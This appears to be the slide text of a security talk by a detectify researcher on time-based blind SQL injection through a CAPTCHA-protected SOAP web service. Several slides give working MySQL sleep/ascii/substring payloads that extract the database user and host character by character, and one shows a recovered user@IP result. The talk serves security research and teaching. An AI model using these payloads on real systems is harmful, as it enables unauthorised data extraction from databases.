Frans Rosén of detectify discusses SQL injection techniques through a SOAP webservice. He provides steps to create a proof of concept attack with as few requests as possible to find vulnerable storefronts. Examples are given of time-based SQL injection payloads using substring, ascii, and sleep functions to retrieve the username and potentially other information about the target host. A link is also provided to a paper on SQL injection optimization and obfuscation techniques.

1. detectify
Time based captcha protected
SQL injection through SOAP-webservice
Frans Rosén @fransrosen

2. detectify
Search + CAPTCHA

3. detectify
Search for Bobby: '

4. detectify
Search: '-sleep(5)-'

5. detectify
CAPTCHA…
https://twitter.com/offensive_image/status/751191306500734976

6. detectify
Me need
1. Do a clear PoC – get data
2. As few requests as possible
3. Find ALL the store fronts!
4. ???
5. PROFIT!!!

7. detectify
user()
'-sleep((ascii(substring(user(), 1, 1)) - 90) / 2)-'

8. detectify
user()
'-sleep((ascii(substring(user(), 1, 1)) - 90) / 2)-'
(14*2) + 90 = 118 == v

9. detectify
Validate
'-(if(ascii(substring(user(), 1, 1)) = 117, sleep(3),1))-
(if(ascii(substring(user(), 1, 1)) = 118, sleep(6),1))-
(if(ascii(substring(user(), 1, 1)) = 119, sleep(9),1))-'
=== v

10. detectify
Down on the @
'-sleep((ascii(substring(user(), 21, 1)) - 90) / 2)-'

11. detectify
Host search
'-sleep((ascii(substring(user(), 21, 1)) - 46) * 2)-'

12. detectify
Host search
0s for a dot
(T - 4) / 2
= 2
'-sleep((ascii(substring(user(), 21, 1)) - 46) * 2)-'

13. detectify
Setup

14. detectify
Result
rawskuiumsal@192.251.68.254

15. detectify
Result

16. detectify
Other
https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-WP.pdf
SQL Injection Optimization and Obfuscation Techniques

17. detectify
Thanks!
Frans Rosén (@fransrosen) – www.detectify.com